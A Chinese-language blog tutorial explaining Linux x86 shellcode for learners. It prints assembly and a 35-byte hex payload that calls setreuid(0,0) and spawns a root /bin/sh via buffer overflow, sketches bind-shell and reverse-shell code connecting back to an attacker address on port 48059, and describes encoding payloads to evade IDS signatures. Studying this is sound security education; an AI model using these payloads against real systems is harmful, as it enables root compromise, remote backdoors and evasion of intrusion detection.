对于初期接触网络安全的人来说, Shellcode 是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞入侵时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情是属于爱好者学习技术,还是黑客的行为,就看攻击者的一念之差了。 Shellcode 就好象神秘的武器,安全防护变得如此不堪一击。 Shellcode 究竟是什么样的程序?是什么特殊代码?如何才能学会编写?我下面收集了几类常见的 Shellcode ,主要是学习使用。它其实也是一般的软件程序,主要是因为二进制码的“不可读性”,增加了神秘色彩。
Shellcode 是指能完成特殊任务的自包含的二进制代码,根据不同的任务可能是发出一条系统调用或建立一个高权限的 Shell , Shellcode 也就由此得名。它的最终目的是取得目标机器的控制权,所以一般被攻击者利用系统的漏洞送入系统中执行,从而获取特殊权限的执行环境,或给自己设立有特权的帐户。 Shellcode 因操作系统有一些差异,这里以 Linux 为例。
Shellcode 是一段高技巧的软件代码,为了小而精,一般直接写为 16 进制的操作码,当然编写者一般采用 C 或汇编编写,然后通过汇编程序成为 16 进制的操作码。
1 、获取特殊权限 :攻击的目标通常是某个 SUID( 具有高权限的系统程序 ) 程序,因为它可以具有较高的特权去执行一些命令 ( 比如修口令等 ) ,好的 SUID 程序会在不必要时放弃过高的特权,需要时再重新设置获取特权。 Setreuid 是用来设置 ( 恢复 ) 进程的真实和有效的用户 ID 。当然也就可以设置 root(0) 的权限。
xor ebx,ebx 参数一:真实用户 id(ruid)=0
xor ecx,ecx 参数二:有效用户 id(euid)=0
xor eax,eax
mov al,0×46 系统调用 0×46
int 0×80 设置 setreuid(0,0)
有了 root(0) 用户权限,系统基本就归你指挥了。
2 、执行 /bin/sh : 有了特权,还要有个“工作室”, shell 是 Linux 常用的控制台,取得一个有特权的 shell ,就可以让你“随意”工作了。建立一个 shell 并不复杂,一般采用 execve 调用执行 /bin/sh 软件
char *shell[2] ;
shell[0]=”/bin/sh”;
shell[1]=0;
execve(shell[0],shell,NULL);
该调用 C 语言编写很简单,对应的汇编代码也不复杂:
xor eax,eax eax=0
push eax eax=null
push 0x68732f2f 压栈 //sh
push 0x6e69622f 压栈 /bin
mov ebx,esp ebx=esp 指向 /bin/sh
push eax eax=null 结束栈 null
push ebx 参数 2 ebx 指向 /bin/sh
mov ecx,esp 参数 3 ecx 指向 [“/bin/sh”,NULL]
xor edx,edx 参数 4 edx=NULL
mov al,0xb 参数 1 eax=0xb
int 0×80
综合以上两个部分,就是最常见的 Shellcode 了,具体生成的 16 进制代码如下 ( 共 35 个字节 ) :
/x31/xc0/xb0/x46/x31/xdb/x31/xc9/xcd/x80 ;setreuid(0,0)
/x31/xc0/x50/x68/x2f/x2f/x73/x68/x68/x2f/x62/x69/x6e/x89/xe3/x50/x53/x89/xe1
/x31/xd2/xb0/x0b/xcd/x80 ; 执行 /bin/sh
该代码可以放置在缓冲区内,通过指针函数调用执行。在缓冲区溢出等方式获得执行权利时,运行该段代码就可以打开一个具有 root(0) 权限的 shell 界面。
Shellcode 在不同的场合,可能有严格的限制,比如在命令行溢出漏洞时,不能太大,没有有效的空间来存放代码,所以要严格精简代码的长度。在 SQL 注入时对长度的要求更加苛刻,所以很多业界流行的、优秀的 Shellcode 是经过各种技巧精练的结果。 Shellcode 是攻击注入代码的统称,并非一定是打开 Shell ,根据漏洞程序本身的特性有很多的改变,有兴趣的朋友可以从网上收集。
3 、绑定到端口的 Shellcode
用 shellcode 在目标计算机上打开一个端口 ( 通讯服务 ) ,并将 Shell 绑定到该端口,攻击者可以放弃入侵时的用的端口,等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接,因为是打开了 shell ,所以等于建立远程控制目标的控制台。
开启服务离不开 Socket , Socket 定义为一个端口和一个 IP 到一个进程的绑定。
a) 建立本地 IP Socket , TCP
int server
server=socket(2,1,0)
b) 用 IP 和端口建立一个 Sockaddr_in 结构
struct sockaddr_in server_addr
server_addr.sin_addr.s_addr=0 socket 的地址设为本地地址
server_addr.sin_port=0xBBBB socket 的端口设为 0xBBBB=48059
server_addr.sin_family=2 协议族为 IP
c) 将端口和 IP 绑定到 Socket 上
bind(server, (struct sockaddr *)&server_addr, 0×10)
d) 以监听模式启动 socket :打开端口并等待连接
listen(server, 0)
e) 有连接时,向客户返回一个句柄
int client
client=accept(server, 0, 0)
f) 将返回的句柄,复制到 stdin 、 stdout 、 stderr , shell 输出到攻击者 (client) 的屏幕
dup2(client,0)
dup2(client,1)
dup2(client,2)
g) 调用普通的 execve 执行 shellcode
char *shell[2] ;
shell[0]=”/bin/sh”
shell[1]=0
execve(shell[0], shell, 0)
4 、反向连接的 shellcode
当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的 shellcode 建立了服务后门,你还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的 IP( 攻击者的 ) 和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。
很多木马就利用这种方式,主动连接带木马的管理者,“神不知,鬼不觉”地把目标计算机加入到某个“僵尸网络”的黑社会团伙中。
a) 建立本地 IP Socket , TCP
int soc
soc=socket(2,1,0)
b) 用 IP 和端口建立一个 Sockaddr_in 结构
struct sockaddr_in server_addr
server_addr.sin_addr.s_addr=0x660A0A0A socket 的地址设为 10.10.10 .102
server_addr.sin_port=0xBBBB socket 的端口设为 0xBBBB=48059
server_addr.sin_family=2 协议族为 IP
c) 建立反向连接 connect
int remote
remote=connect(soc, (struct sockaddr*)&server_addr, 0×10)
d) 将 socket 复制到 stdin 、 stdout 、 stderr , shell 输出到攻击者的屏幕
dup2(soc,0)
dup2(soc,1)
dup2(soc,2)
e) 调用普通的 execve 执行 shellcode
char *shell[2] ;
shell[0]=”/bin/sh”
shell[1]=0
execve(shell[0], shell, 0)
注意: 10.10.10 .102 为防火墙外攻击机器的地址,此时在该机器上要启动一个监听 48059 端口的服务
5 、躲避 IDS 的过滤
由于经典的 Shellcode 并不是有很多的版本,大多数人员都是采用同样的 Shellcode ,很少有人自己编写。所以 IDS 厂商把常见的 Shellcode 的指纹提取出来,作为验证攻击行为的“特征”,很多攻击行为就暴露在 IDS 的监控之下,网络管理人员可以很快知道你到了他的网络内部,进而采取“捕获”措施。
所以,隐藏指纹,变换代码, Shellcode 也在不断更新。技术很多,这里就不例举了,提一个有意思的思路:因为 Shellcode 的基本功能相同,都是诱使目标机器执行这些指令,目标代码在传输和存放时是很容易被 IDS 或系统察觉的,那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位,“加密”后的代码没有任何“意义”,到执行前再反向移位,被检测到的概率就小多了,这种方式对躲避 IDS 是很有效果的。
本文出自 “Jack zhai ” 博客,请务必保留此出处http://zhaisj.blog.51cto.com/219066/61428